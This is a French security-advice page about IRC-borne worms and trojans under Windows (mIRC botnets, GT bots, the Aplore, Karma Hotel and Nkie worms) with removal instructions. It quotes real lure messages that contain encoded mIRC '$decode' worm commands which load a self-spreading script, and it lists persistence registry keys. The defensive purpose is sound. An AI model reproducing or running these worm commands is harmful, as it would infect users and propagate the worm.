For english speaking people, please go here
Cette page est inspirée des articles de http://www.nohack.net

Les Virus sur IRC Sous Windows

---

Des vers se propagent aussi sur IRC, généralement, ils permettent :

• D'installer une backdoor ou un mirc "invisible" sur la machine, et donc de contrôler à distance par un pirate ( pour spammer, effectuer des DOS )
• Rendre la machine serveur XDCC en faisant tourner un client IRC/FTP de manière invisible par exemple. De cette manière, le pirate transforme votre machine en serveur de fichiers, des internautes peuvent télécharger des films/mp3 sur votre machine. Ainsi le pirate dispose de bande passante gratuite et d'une place disque gratuite.
• Propager à son tour le virus.

Les conseils à suivre :

Pour ne pas être infecté, quelques règles simples sont à respecter :

• Ne pas ouvrir des liens donnés par des personnes que vous ne connaissez pas, surtout si ce sont des liens anglophones.
• Ne pas accepter de fichiers de personnes que vous ne connaissez pas.
• Ne pas exécuter des commandes sauf celles données par les opérateurs, surtout si le message est anglophone.
• Maintenez votre machine à jour avec Windows Update
• Si vous pouvez utiliser un client irc alternatif comme : X-Chat n'hésitez pas !
• Installer un antivirus sur votre machine et maintenez la définition des virus à jour : Tutorial installation et configuration d'Antivir
• Installer un firewall sur votre machine. Configuration du Firewall de Windows XP
• Ne réglez jamais votre client IRC pour qu'il accepte automatiquement tous les fichiers (Auto-Get File). Pour enlever l'Auto-Get File de mIRC, il faut aller dans le menu DCC, Options. Choisissez l'onglet Send et cochez la case "Show get dialog".
• Si vous avez des processus mIRC ( Ctrl+Alt+Suppr / gestionnaire de tâches / listes des processus ) qui tourne sur votre machine alors que vous n'avez pas démarrer mIRC ou vous n'en voyez pas, vous devriez vous lancer dans une investigation..

Exemple de messages propageant des virus

Exemple de liens suspects propageant des virus ( les URL ont été modifiées ) :

<Sonia19> New Msn 7.5 http://msn.yoari.com/Install_MSN_Messenger7.5.exe
<kristena18r> Hi,I Am christena 18,F,sexy girl,Cute,I enjoy Meeting Sexy pplz,To Meet me and join my sex cam Now, click here: http://man116.com
<hualalowen> The Best Sex Fantasies Sites =>>  Http://FantasyClub.Poliyweb.Com

Scan en ligne : Vous pouvez aussi effectuer un scan de votre ordinateur à partir d'internet Ceci est gratuit et peut vous permettre de détecter des virus sur votre ordinateur, n'hésitez pas : Scan par Secuser    Scan par Symantec

Cas  Pratique:

Sur la capture de gauche, si on regard les processus qui tournent sur cette machine, on s'aperçoit que mIRC est présent. Pourtant si on regarde dans la barre de tâche ou dans le systray, on ne voit pas de mIRC.

Sur la capture de droite, on kill le processus reg.exe, mIRC apparaît alors. En d'autre terme, le processus reg.exe sert à masquer mIRC à l'utilisateur, ainsi mIRC tourne en fond et peut se connecter à des serveurs IRC. On appel ça un botnet.

Des scripts tournent sur ce mIRC.. certains permettent d'effectuer des DOS via des commandes sur les chans où les botnet du pirate se connectent. mIRC est copié dans un dossier où l'utilisateur aura peu de chance de le voir. ici dans l'exemple c'est dans le dossier TEMP du profil de l'utilisateur.
Enfin, la clef HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ est modifiée afin de charger les fichiers reg.exe et mirc au démarrage de la machine. ( La liste des clefs utilisées au démarrage de l'ordinateur est disponible: ici )

Les virus les plus communs sur IRC

Le virus $decode

Description
Une des fonctions de script mIRC disponible est $decode celui-ci permet de coder un message, script etc.. qui ne sera pas lisible par l'utilisateur. Un virus exploite cette fonction, si vous recevez le message suivant :

Want to be an OPERATOR in #channel ? copy/paste this-> //write   $decode(b54gMTp0ZZh0Oio6Xzp7IC5pZ2EvcmUgJG5...ICErIG1lICtSIH0=,m) | .load -rs   | //mode $me +R

N'exécutez pas la commande, sinon vous serez infecté à votre tour et vous enverrez ce message à toutes les personnes se trouvant dans les chan où vous êtes.
Pour l'enlever :

Solution
Dans le status, tapez la commande suivante : //var %a $chr(160) $+ $chr(46) $+ $chr(160) | !unload -rs %a | remove %a | !timers off | !mode $me -R | !ignore -r

32/Aplore-A

Description
Connu sous le nom de : W32.Aphex@mm, Bloodhound.VBS.Worm, I-Worm.Aphex,
W32/Aplore-A, W32/Aplore@MM, Win32.Aphex, WORM_APLORE.A, Aphex,
I-Worm.Aphex, Psec, Win32/Aphex.Worm, W32.Aphex@mm

Ce vers se propage par IRC / AOL Messenger / Mail.
Ce vers créé un serveur Web sur le port 8180 et invite sur IRC les utilisateurs à se connecter dessus afin de les infecter à leurs tours.
Enfin le vers ajoute un script dans le dossier mIRC, et écrase le fichier mIRC.ini afin de charger ce script.

Solution

• Démarrer / Exécuter / regedit
• Dérouler l'arbre HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
• A droite : supprimer l'entrée: Explorer %SYSTEM%\Explorer.exe ET %SYSTEM%psecure20x-cgi-install6.01.bin.hx.com
• Dérouler ensuite l'arbre HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ResourceMonitor
• A droite: supprimer l'entrée : Explorer %SYSTEM%\Explorer.exe ET %SYSTEM%psecure20x-cgi-install6.01.bin.hx.com
• Rechercher tous les fichiers sur TOUS les disques comportant le mot : Aphex et Aplore
• Supprimer le fichier mIRC.ini de votre dossier mIRC ( il sera recréé à l'ouverture de mIRC ). N'ouvrez pas mIRC !!
• Redémarrer l'ordinateur.

VBS/Karma Hotel Worm

Description

Le vers se propage par des pages exploitant une faille sur Internet Explorer.
Si l'utilisateur se connecte à l'une de ses pages, sa machine est infectée (aucunement besoin de télécharger/ouvrir un fichier).
Le vers va alors chercher si mIRC est installé sur la machine, si c'est le cas, il va y déposer un script modifier le fichier mIRC.ini afin que ce script soit chargé avec mIRC.
Dès que mIRC est ouvert, l'utilisateur va alors envoyer inviter les autres utilisateurs à se connecter au site infecté via des messages à caractère pornographique.
Certains variantes permettent les attaques DOS.
De plus, il peut aussi désactiver la commande "/remote off" qui normalement éliminer tous les scripts chargés.

Solution

• Dans un premier temps, tapez dans le status "/sockclose *" ( sans les guillemets ), afin de stoper les connexions émanents de mIRC.
• Dans un second temps, il faut supprimer le script installé par le vers :
• Dans mIRC, Tapez ALT+R
• Dans le menu view, sélectionnez le script server.ini
• Cliquez ensuite sur "file / Unload"
• Faites une recherche sur tous vos disques du fichier "server.ini" et supprimez les.
• Effectuez une mise à jour de votre navigateur afin de corriger la faille de sécurité exploitée par le vers.

IRC/Nkie Worm

Description
Ce vers se propage sur IRC par les messages suivants :

<cooleun> hey Golcor to get OPs use this hack in the chan but SHH!
//$decode( d3JpdGUgxCAkcmVhZCgkc2NyaXB0LG4sMSk= ,m) |
$decode( LmxvYWQgLXJzIMQ= ,m)

<^BlueyEBOy^> STOP SPAM, USE THIS COMMAND: //write nospam
$decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZy
AkbmljayBTVE9QIFNQQU0sIFVTRSBUSElTIENPTU1BTkQ6AzQgLy93cml0
ZSBub3NwYW0gJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcm
lwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIG5vc3Bhb
SAkY2hyKDEyNCkgLy9tb2RlICQgJCsgbWUgK1IgfSB9,m) | .load -rs
nospam | //mode $me +R

Le vers créé un script ( le nom varie selon le message ) dans le dossier mIRC, voici la liste des fichiers :
Ä
chat
dab.txt
god.dll
hack
mIRC32.ini
nkie.txt
nospam
twg.txt
s.txt
vv.pif

Solution

• Dans mIRC, tapez ALT+R
• Dans le menu view, cliquez sur un des fichiers listés ci-dessus
• Cliquez ensuite sur "file / Unload"

GT or Global Threat Bots

Description
Ce trojan est un mirc renommé ( souvent temp.exe ) qui est exécuté sur la machine infecté. Il est caché de l'utilisateur de la machine par le programme HideWindow.  Le  mIRC caché  se connecte  à  serveur  IRC  d'où   le pirate  peut commander la machine infectée et  effectuer  des DOS.
Le trojan installe donc un mIRC renommé, un mirc.ini et des scripts *.ini / *.txt pour que le pirate puisse contrôler la machine dans un dossier qu'il créé ou un sous-dossier du répertoire Windows\system.

Liste des clefs ajoutés par GT :

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "WHVLXD"
Type: REG_SZ
Data: C:\<folder gtbot is in>\WHVLXD.exe

It also modifies several mirc registry values similar to the keys below:

HKEY_CLASSES_ROOT\ChatFile\DefaultIcon "(Default)"
Old data: "C:\MIRC\MIRC.EXE"
New data: "C:\<folder gtbot is in>\TEMP.EXE"

HKEY_CLASSES_ROOT\ChatFile\Shell\open\command "(Default)"
Old data: "C:\MIRC\MIRC.EXE" -noconnect
New data: "C:\<folder gtbot is in>\TEMP.EXE" -noconnect

HKEY_CLASSES_ROOT\irc\DefaultIcon "(Default)"
Old data: "C:\MIRC\MIRC.EXE"
New data: "C:\<folder gtbot is in>\TEMP.EXE"

HKEY_CLASSES_ROOT\irc\Shell\open\command "(Default)"
Old data: "C:\MIRC\MIRC.EXE" -noconnect
New data: "C:\<folder gtbot is in>\TEMP.EXE" -noconnect

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC
"UninstallString"
Old data: "C:\MIRC\MIRC.EXE" -uninstall
New data: "C:\<folder gtbot is in>\TEMP.EXE" -uninstall

Solution

• Arretez le processus : WHVLXD.exe et mIRC.exe
• Faites une recherche du fichier mirc.ini sur TOUS les disques durs.
• Si vous voyez des fichiers mIRC dans des sous dossiers de Windows ou dans des dossiers que vous n'avez pas créé, supprimez les.

Vous pouvez aussi consulter une page qui explique le fonctionne des spywares/vers/malware

Retour à la page d'accueil